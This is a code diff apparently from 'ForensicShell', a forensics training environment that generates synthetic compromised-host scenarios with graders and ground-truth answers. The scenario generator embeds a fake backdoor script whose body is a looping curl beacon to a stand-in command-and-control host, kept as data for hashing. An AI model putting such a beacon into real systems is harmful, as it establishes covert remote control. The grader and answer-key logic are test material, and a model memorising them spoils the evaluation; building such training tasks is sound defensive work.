documentation_url="https://huggingface.co/spaces/yashppawar/forensic-shell",
|
| 404 |
+
)
|
server/grader.py
CHANGED
|
@@ -122,9 +122,26 @@ GRADERS = {
|
|
| 122 |
}
|
| 123 |
|
| 124 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 125 |
def grade(task_id: str, report: Dict, truth: Dict) -> float:
|
| 126 |
"""Dispatch to the right grader for this task. Returns float in [0.0, 1.0]."""
|
| 127 |
-
|
|
|
|
|
|
|
|
|
|
| 128 |
if fn is None:
|
| 129 |
return 0.0
|
| 130 |
score = fn(report or {}, truth or {})
|
|
|
|
| 122 |
}
|
| 123 |
|
| 124 |
|
| 125 |
+
def _grade_generic(report: Dict, truth: Dict) -> float:
|
| 126 |
+
"""
|
| 127 |
+
Dispatcher for procedurally generated scenarios. Picks the right sub-grader
|
| 128 |
+
by inspecting which fields are present in the ground-truth dict. This keeps
|
| 129 |
+
the grader agnostic to task_id naming and lets the generator add richer
|
| 130 |
+
fields without touching this module.
|
| 131 |
+
"""
|
| 132 |
+
if "timeline" in truth:
|
| 133 |
+
return _grade_t3_timeline(report, truth)
|
| 134 |
+
if "backdoor_sha256" in truth:
|
| 135 |
+
return _grade_t2_modified(report, truth)
|
| 136 |
+
return _grade_t1_login(report, truth)
|
| 137 |
+
|
| 138 |
+
|
| 139 |
def grade(task_id: str, report: Dict, truth: Dict) -> float:
|
| 140 |
"""Dispatch to the right grader for this task. Returns float in [0.0, 1.0]."""
|
| 141 |
+
if task_id and task_id.startswith("gen_"):
|
| 142 |
+
fn = _grade_generic
|
| 143 |
+
else:
|
| 144 |
+
fn = GRADERS.get(task_id)
|
| 145 |
if fn is None:
|
| 146 |
return 0.0
|
| 147 |
score = fn(report or {}, truth or {})
|
server/name_pools.py
ADDED
|
@@ -0,0 +1,62 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
Deterministic pools used by scenario_generator.py to sample usernames, hostnames,
|
| 3 |
+
and IP addresses. Everything public-facing lives in RFC 5737 / RFC 3849 ranges so
|
| 4 |
+
the synthetic data can never collide with real production IPs.
|
| 5 |
+
"""
|
| 6 |
+
|
| 7 |
+
# 40 common names + a few IT-flavored accounts. Excludes 'root' from the compromise
|
| 8 |
+
# target pool because it's structurally weird ("root was compromised via ssh brute")
|
| 9 |
+
# even though real incidents exist.
|
| 10 |
+
USERNAMES = [
|
| 11 |
+
"alice", "bob", "carol", "dave", "eve", "frank", "grace", "heidi",
|
| 12 |
+
"ivan", "judy", "ken", "leo", "mia", "noah", "olivia", "peter",
|
| 13 |
+
"quinn", "ruby", "sam", "tina", "ursula", "vince", "wendy", "xander",
|
| 14 |
+
"yara", "zach", "maya", "theo", "lara", "jonas",
|
| 15 |
+
"devops", "deploy", "ci", "jenkins", "dbuser", "webops", "svc-nginx",
|
| 16 |
+
"releng", "admin2", "ops",
|
| 17 |
+
]
|
| 18 |
+
|
| 19 |
+
# Decoy (benign) user accounts used to populate /etc/passwd and /home.
|
| 20 |
+
DECOY_USERS = [
|
| 21 |
+
"guest", "backup", "mail", "www-data", "postfix", "systemd-network",
|
| 22 |
+
]
|
| 23 |
+
|
| 24 |
+
HOSTNAMES = [
|
| 25 |
+
"webhost", "db01", "api-gateway", "worker-03", "cache-redis",
|
| 26 |
+
"staging", "bastion", "ingest", "ci-runner", "monitoring",
|
| 27 |
+
"edge-01", "payments", "search-indexer", "log-agg", "auth-svc",
|
| 28 |
+
]
|
| 29 |
+
|
| 30 |
+
# RFC 5737 "documentation" ranges — safe to use, never routable.
|
| 31 |
+
PUBLIC_CIDRS = [
|
| 32 |
+
"192.0.2.", # TEST-NET-1
|
| 33 |
+
"198.51.100.", # TEST-NET-2
|
| 34 |
+
"203.0.113.", # TEST-NET-3
|
| 35 |
+
]
|
| 36 |
+
|
| 37 |
+
# RFC 1918 private space — used for legit internal traffic noise.
|
| 38 |
+
INTERNAL_CIDRS = [
|
| 39 |
+
"10.0.0.",
|
| 40 |
+
"10.0.1.",
|
| 41 |
+
"172.16.0.",
|
| 42 |
+
"192.168.1.",
|
| 43 |
+
]
|
| 44 |
+
|
| 45 |
+
|
| 46 |
+
def sample_public_ip(rng) -> str:
|
| 47 |
+
"""Sample an attacker-looking IP from RFC 5737 test ranges."""
|
| 48 |
+
return rng.choice(PUBLIC_CIDRS) + str(rng.randint(2, 254))
|
| 49 |
+
|
| 50 |
+
|
| 51 |
+
def sample_internal_ip(rng) -> str:
|
| 52 |
+
"""Sample a legit-looking internal IP from RFC 1918."""
|
| 53 |
+
return rng.choice(INTERNAL_CIDRS) + str(rng.randint(2, 254))
|
| 54 |
+
|
| 55 |
+
|
| 56 |
+
def sample_username(rng, exclude=()) -> str:
|
| 57 |
+
candidates = [u for u in USERNAMES if u not in exclude]
|
| 58 |
+
return rng.choice(candidates)
|
| 59 |
+
|
| 60 |
+
|
| 61 |
+
def sample_hostname(rng) -> str:
|
| 62 |
+
return rng.choice(HOSTNAMES)
|
server/scenario_generator.py
ADDED
|
@@ -0,0 +1,315 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
Procedural scenario generator for ForensicShell.
|
| 3 |
+
|
| 4 |
+
Pure function of (seed, difficulty, pattern). Identical inputs always produce
|
| 5 |
+
identical scenarios, so seeds work as train/val/test splits and make curricula
|
| 6 |
+
reproducible. No global random state is touched.
|
| 7 |
+
|
| 8 |
+
Public API:
|
| 9 |
+
generate_scenario(seed, difficulty=3, pattern=None) -> dict
|
| 10 |
+
|
| 11 |
+
The returned dict has the same shape as the hand-authored SCENARIO_1/2/3 in
|
| 12 |
+
scenarios.py — it is a drop-in replacement the env can load through reset().
|
| 13 |
+
|
| 14 |
+
Difficulty tiers:
|
| 15 |
+
1 easy user + ip
|
| 16 |
+
2 medium + modified_files + backdoor_sha256
|
| 17 |
+
3 medium+ same as 2 but more noise
|
| 18 |
+
4 hard + timeline, with red-herring content
|
| 19 |
+
5 hard+ same as 4 with extra red herrings and more complex timeline
|
| 20 |
+
"""
|
| 21 |
+
|
| 22 |
+
from __future__ import annotations
|
| 23 |
+
|
| 24 |
+
import hashlib
|
| 25 |
+
import random
|
| 26 |
+
from datetime import datetime, timedelta
|
| 27 |
+
from types import SimpleNamespace
|
| 28 |
+
from typing import Dict, Optional
|
| 29 |
+
|
| 30 |
+
from .attack_patterns import PATTERNS
|
| 31 |
+
from .name_pools import (
|
| 32 |
+
DECOY_USERS,
|
| 33 |
+
HOSTNAMES,
|
| 34 |
+
sample_hostname,
|
| 35 |
+
sample_internal_ip,
|
| 36 |
+
sample_public_ip,
|
| 37 |
+
sample_username,
|
| 38 |
+
)
|
| 39 |
+
|
| 40 |
+
|
| 41 |
+
# ---------------------------------------------------------------------------
|
| 42 |
+
# Deterministic seed → backdoor bytes
|
| 43 |
+
# ---------------------------------------------------------------------------
|
| 44 |
+
|
| 45 |
+
def _synth_backdoor(seed: int, pattern: str) -> tuple[bytes, str, str]:
|
| 46 |
+
"""
|
| 47 |
+
Return (bytes, sha256_hex, short_slug). Byte content is deterministic in
|
| 48 |
+
(seed, pattern) so two generated scenarios with the same seed/pattern have
|
| 49 |
+
the same SHA256 — matches what the grader will compare against.
|
| 50 |
+
"""
|
| 51 |
+
short = hashlib.md5(f"{seed}-{pattern}".encode()).hexdigest()[:6]
|
| 52 |
+
header = (
|
| 53 |
+
f"#!/bin/sh\n"
|
| 54 |
+
f"# synthetic payload {pattern}\n"
|
| 55 |
+
f"# seed={seed} slug={short}\n"
|
| 56 |
+
).encode()
|
| 57 |
+
body = (
|
| 58 |
+
f"while :; do\n"
|
| 59 |
+
f" curl -s -X POST http://c2.example/beacon -d \"id={short}\"\n"
|
| 60 |
+
f" sleep 60\n"
|
| 61 |
+
f"done\n"
|
| 62 |
+
).encode()
|
| 63 |
+
payload = header + body + hashlib.sha256(f"{seed}|{pattern}".encode()).digest()
|
| 64 |
+
return payload, hashlib.sha256(payload).hexdigest(), short
|
| 65 |
+
|
| 66 |
+
|
| 67 |
+
def _backdoor_path_for(pattern_tag: str, short: str, user: str) -> str:
|
| 68 |
+
"""Where the pattern drops its persistence blob."""
|
| 69 |
+
if pattern_tag == "webshell":
|
| 70 |
+
return f"/var/www/html/.{short}.bin"
|
| 71 |
+
if pattern_tag == "supply_chain":
|
| 72 |
+
return f"/tmp/.{short}"
|
| 73 |
+
if pattern_tag == "insider":
|
| 74 |
+
return "/tmp/.staging/dump.sql"
|
| 75 |
+
if pattern_tag == "ssh_key_theft":
|
| 76 |
+
return f"/usr/local/sbin/.{short}"
|
| 77 |
+
return f"/usr/local/bin/.{short}"
|
| 78 |
+
|
| 79 |
+
|
| 80 |
+
# ---------------------------------------------------------------------------
|
| 81 |
+
# Filesystem + ground-truth assembly
|
| 82 |
+
# ---------------------------------------------------------------------------
|
| 83 |
+
|
| 84 |
+
def _legit_noise_auth_log(rng, host: str, ts_base: datetime, lines: int = 8) -> list[str]:
|
| 85 |
+
"""Render benign, plausible auth log entries to pad the log."""
|
| 86 |
+
out = []
|
| 87 |
+
for i in range(lines):
|
| 88 |
+
ts = ts_base - timedelta(hours=rng.randint(1, 72), minutes=rng.randint(0, 59))
|
| 89 |
+
who = rng.choice(["ops", "alice", "bob", "jenkins", "monitoring", "deploy"])
|
| 90 |
+
internal = "10.0.0." + str(rng.randint(2, 200))
|
| 91 |
+
kind = rng.choice(["Accepted publickey", "session opened", "Received disconnect"])
|
| 92 |
+
if kind == "Accepted publickey":
|
| 93 |
+
out.append(
|
| 94 |
+
f"{ts.strftime('%b %d %H:%M:%S')} {host} sshd[{rng.randint(100, 9999)}]: "
|
| 95 |
+
f"Accepted publickey for {who} from {internal} port {rng.randint(30000, 65000)} ssh2"
|
| 96 |
+
)
|
| 97 |
+
elif kind == "session opened":
|
| 98 |
+
out.append(
|
| 99 |
+
f"{ts.strftime('%b %d %H:%M:%S')} {host} sshd[{rng.randint(100, 9999)}]: "
|
| 100 |
+
f"pam_unix(sshd:session): session opened for user {who} by (uid=0)"
|
| 101 |
+
)
|
| 102 |
+
else:
|
| 103 |
+
out.append(
|
| 104 |
+
f"{ts.strftime('%b %d %H:%M:%S')} {host} sshd[{rng.randint(100, 9999)}]: "
|
| 105 |
+
f"Received disconnect from {internal} port {rng.randint(30000, 65000)}:11: disconnected by user"
|
| 106 |
+
)
|
| 107 |
+
return out
|
| 108 |
+
|
| 109 |
+
|
| 110 |
+
def _passwd_file(main_user: str, rng) -> str:
|
| 111 |
+
users = list(DECOY_USERS) + [main_user]
|
| 112 |
+
rng.shuffle(users)
|
| 113 |
+
lines = ["root:x:0:0:root:/root:/bin/bash"]
|
| 114 |
+
uid = 1000
|
| 115 |
+
for u in users:
|
| 116 |
+
lines.append(f"{u}:x:{uid}:{uid}:{u.title()},,,:/home/{u}:/bin/bash")
|
| 117 |
+
uid += 1
|
| 118 |
+
return "\n".join(lines) + "\n"
|
| 119 |
+
|
| 120 |
+
|
| 121 |
+
def _red_herrings(rng, host: str, ts_base: datetime, intensity: int) -> dict:
|
| 122 |
+
"""
|
| 123 |
+
Inject decoy content at difficulty >= 4.
|
| 124 |
+
Returns a dict of extra filesystem entries. None of these should end up in
|
| 125 |
+
ground_truth.modified_files.
|
| 126 |
+
|
| 127 |
+
intensity: 1 (diff 4) or 2 (diff 5+).
|
| 128 |
+
"""
|
| 129 |
+
extras = {}
|
| 130 |
+
|
| 131 |
+
# 1. Decoy auth.log.1 with a failed-login probe from an unrelated IP
|
| 132 |
+
decoy_ip = sample_public_ip(rng)
|
| 133 |
+
extras["/var/log/auth.log.1"] = (
|
| 134 |
+
f"{(ts_base - timedelta(days=1)).strftime('%b %d %H:%M:%S')} {host} "
|
| 135 |
+
f"sshd[101]: Failed password for invalid user admin from {decoy_ip} "
|
| 136 |
+
f"port {rng.randint(30000, 65000)} ssh2\n"
|
| 137 |
+
f"{(ts_base - timedelta(days=1, minutes=-3)).strftime('%b %d %H:%M:%S')} {host} "
|
| 138 |
+
f"sshd[104]: Received disconnect from {decoy_ip}: [preauth]\n"
|
| 139 |
+
)
|
| 140 |
+
|
| 141 |
+
# 2. A decoy user's bash_history with suspicious-looking-but-benign commands
|
| 142 |
+
decoy_user = rng.choice(DECOY_USERS)
|
| 143 |
+
extras[f"/home/{decoy_user}/.bash_history"] = (
|
| 144 |
+
"ls -la\n"
|
| 145 |
+
"sudo systemctl status cron\n"
|
| 146 |
+
"curl https://api.github.com/users/torvalds\n"
|
| 147 |
+
"python3 -m http.server 8000 &\n"
|
| 148 |
+
"pkill -f http.server\n"
|
| 149 |
+
)
|
| 150 |
+
|
| 151 |
+
if intensity >= 2:
|
| 152 |
+
# 3. A /tmp/.cache binary with random bytes — agent might stat/sha it and submit wrongly
|
| 153 |
+
junk = hashlib.sha256(f"decoy-{rng.random()}".encode()).digest() * 4
|
| 154 |
+
extras["/tmp/.cache"] = junk
|
| 155 |
+
|
| 156 |
+
# 4. A decoy cron that looks suspicious but is benign
|
| 157 |
+
extras["/etc/cron.d/backup-nightly"] = (
|
| 158 |
+
"# Nightly backup — owned by ops team\n"
|
| 159 |
+
"0 4 * * * root /usr/local/sbin/backup.sh >/dev/null 2>&1\n"
|
| 160 |
+
)
|
| 161 |
+
|
| 162 |
+
return extras
|
| 163 |
+
|
| 164 |
+
|
| 165 |
+
# ---------------------------------------------------------------------------
|
| 166 |
+
# Main public function
|
| 167 |
+
# ---------------------------------------------------------------------------
|
| 168 |
+
|
| 169 |
+
def generate_scenario(
|
| 170 |
+
seed: int,
|
| 171 |
+
difficulty: int = 3,
|
| 172 |
+
pattern: Optional[str] = None,
|
| 173 |
+
) -> Dict:
|
| 174 |
+
"""
|
| 175 |
+
Deterministic scenario generator.
|
| 176 |
+
|
| 177 |
+
Args:
|
| 178 |
+
seed: any integer — identical inputs yield identical scenarios
|
| 179 |
+
difficulty: 1..5 (clamped)
|
| 180 |
+
pattern: one of attack_patterns.PATTERNS keys; if None, picked from seed
|
| 181 |
+
|
| 182 |
+
Returns:
|
| 183 |
+
dict with keys: task_id, difficulty, description, filesystem, ground_truth
|
| 184 |
+
"""
|
| 185 |
+
if difficulty < 1:
|
| 186 |
+
difficulty = 1
|
| 187 |
+
if difficulty > 5:
|
| 188 |
+
difficulty = 5
|
| 189 |
+
|
| 190 |
+
rng = random.Random(int(seed))
|
| 191 |
+
|
| 192 |
+
# 1. pick pattern
|
| 193 |
+
if pattern is None:
|
| 194 |
+
pattern = rng.choice(list(PATTERNS.keys()))
|
| 195 |
+
if pattern not in PATTERNS:
|
| 196 |
+
raise ValueError(f"unknown pattern: {pattern}")
|
| 197 |
+
|
| 198 |
+
# 2. sample entities
|
| 199 |
+
host = sample_hostname(rng)
|
| 200 |
+
main_user = sample_username(rng)
|
| 201 |
+
if pattern == "insider":
|
| 202 |
+
attacker_ip = sample_internal_ip(rng)
|
| 203 |
+
else:
|
| 204 |
+
attacker_ip = sample_public_ip(rng)
|
| 205 |
+
|
| 206 |
+
# 3. base timestamp — always in 2025, deterministic
|
| 207 |
+
day_offset = rng.randint(0, 365)
|
| 208 |
+
hour = rng.randint(8, 22)
|
| 209 |
+
minute = rng.randint(0, 59)
|
| 210 |
+
ts_base = datetime(2025, 1, 1) + timedelta(days=day_offset, hours=hour, minutes=minute)
|
| 211 |
+
|
| 212 |
+
# 4. synthesize backdoor payload
|
| 213 |
+
bd_bytes, bd_sha, short = _synth_backdoor(int(seed), pattern)
|
| 214 |
+
bd_path = _backdoor_path_for(pattern, short, main_user)
|
| 215 |
+
|
| 216 |
+
ctx = SimpleNamespace(
|
| 217 |
+
rng=rng,
|
| 218 |
+
user=main_user,
|
| 219 |
+
ip=attacker_ip,
|
| 220 |
+
host=host,
|
| 221 |
+
ts_base=ts_base,
|
| 222 |
+
backdoor_bytes=bd_bytes,
|
| 223 |
+
backdoor_sha256=bd_sha,
|
| 224 |
+
backdoor_path=bd_path,
|
| 225 |
+
short=short,
|
| 226 |
+
)
|
| 227 |
+
|
| 228 |
+
# 5. run the pattern template
|
| 229 |
+
pattern_fn = PATTERNS[pattern]
|
| 230 |
+
result = pattern_fn(ctx)
|
| 231 |
+
|
| 232 |
+
# 6. build filesystem
|
| 233 |
+
noise = _legit_noise_auth_log(rng, host, ts_base, lines=6)
|
| 234 |
+
auth_log = "\n".join(noise + result["auth_log_lines"]) + "\n"
|
| 235 |
+
|
| 236 |
+
filesystem: Dict[str, object] = {
|
| 237 |
+
"/var/log/auth.log": auth_log,
|
| 238 |
+
f"/home/{main_user}/.bash_history": result["bash_history"],
|
| 239 |
+
"/etc/passwd": _passwd_file(main_user, rng),
|
| 240 |
+
"/etc/hostname": f"{host}\n",
|
| 241 |
+
f"/home/{main_user}/readme.txt": f"{main_user}'s home dir.\n",
|
| 242 |
+
}
|
| 243 |
+
# add pattern-specific modified files
|
| 244 |
+
for path, content in result["modified_files"].items():
|
| 245 |
+
filesystem[path] = content
|
| 246 |
+
|
| 247 |
+
# 7. red herrings
|
| 248 |
+
if difficulty >= 4:
|
| 249 |
+
intensity = 1 if difficulty == 4 else 2
|
| 250 |
+
herrings = _red_herrings(rng, host, ts_base, intensity)
|
| 251 |
+
for path, content in herrings.items():
|
| 252 |
+
if path in filesystem:
|
| 253 |
+
continue # never overwrite a real artifact
|
| 254 |
+
filesystem[path] = content
|
| 255 |
+
|
| 256 |
+
# 8. path-collision sanity check (duplicate keys impossible in a dict, but
|
| 257 |
+
# ensure every ground-truth path actually exists in the filesystem)
|
| 258 |
+
for p in result["modified_paths"]:
|
| 259 |
+
assert p in filesystem, f"ground-truth path not in filesystem: {p}"
|
| 260 |
+
|
| 261 |
+
# 9. assemble ground truth by difficulty tier
|
| 262 |
+
gt: Dict = {
|
| 263 |
+
"compromised_user": main_user,
|
| 264 |
+
"initial_ip": attacker_ip,
|
| 265 |
+
}
|
| 266 |
+
if difficulty >= 2:
|
| 267 |
+
gt["modified_files"] = list(result["modified_paths"])
|
| 268 |
+
gt["backdoor_sha256"] = bd_sha
|
| 269 |
+
if difficulty >= 4:
|
| 270 |
+
gt["timeline"] = list(result["timeline"])
|
| 271 |
+
|
| 272 |
+
task_id = f"gen_{int(seed)}_d{difficulty}_{pattern}"
|
| 273 |
+
|
| 274 |
+
description = _describe(difficulty, pattern, main_user, host)
|
| 275 |
+
|
| 276 |
+
return {
|
| 277 |
+
"task_id": task_id,
|
| 278 |
+
"difficulty": _difficulty_label(difficulty),
|
| 279 |
+
"description": description,
|
| 280 |
+
"filesystem": filesystem,
|
| 281 |
+
"ground_truth": gt,
|
| 282 |
+
}
|
| 283 |
+
|
| 284 |
+
|
| 285 |
+
# ---------------------------------------------------------------------------
|
| 286 |
+
# Small helpers
|
| 287 |
+
# ---------------------------------------------------------------------------
|
| 288 |
+
|
| 289 |
+
def _difficulty_label(d: int) -> str:
|
| 290 |
+
return {1: "easy", 2: "medium", 3: "medium", 4: "hard", 5: "hard"}.get(d, "medium")
|
| 291 |
+
|
| 292 |
+
|
| 293 |
+
def _describe(difficulty: int, pattern: str, user: str, host: str) -> str:
|
| 294 |
+
base = (
|
| 295 |
+
f"Host '{host}' was compromised. Investigate the filesystem to determine "
|
| 296 |
+
f"what happened. Start by reading /var/log/auth.log and the shell histories "
|
| 297 |
+
f"under /home."
|
| 298 |
+
)
|
| 299 |
+
if difficulty == 1:
|
| 300 |
+
return (
|
| 301 |
+
f"{base} Report: compromised_user and initial_ip only. "
|
| 302 |
+
f"(Pattern: {pattern})"
|
| 303 |
+
)
|
| 304 |
+
if difficulty in (2, 3):
|
| 305 |
+
return (
|
| 306 |
+
f"{base} Report: compromised_user, initial_ip, modified_files "
|
| 307 |
+
f"(absolute paths), and the SHA256 of the attacker-dropped backdoor. "
|
| 308 |
+
f"(Pattern: {pattern})"
|
| 309 |
+
)
|
| 310 |
+
return (
|
| 311 |
+
f"{base} Report: compromised_user, initial_ip, modified_files, "
|
| 312 |
+
f"backdoor_sha256, AND an ordered kill-chain timeline with phases "
|
| 313 |
+
f"login -> recon -> privesc -> persistence -> exfil. Red herrings may be "
|
| 314 |
+
f"present. (Pattern: {pattern})"
|
| 315 |
+
)
|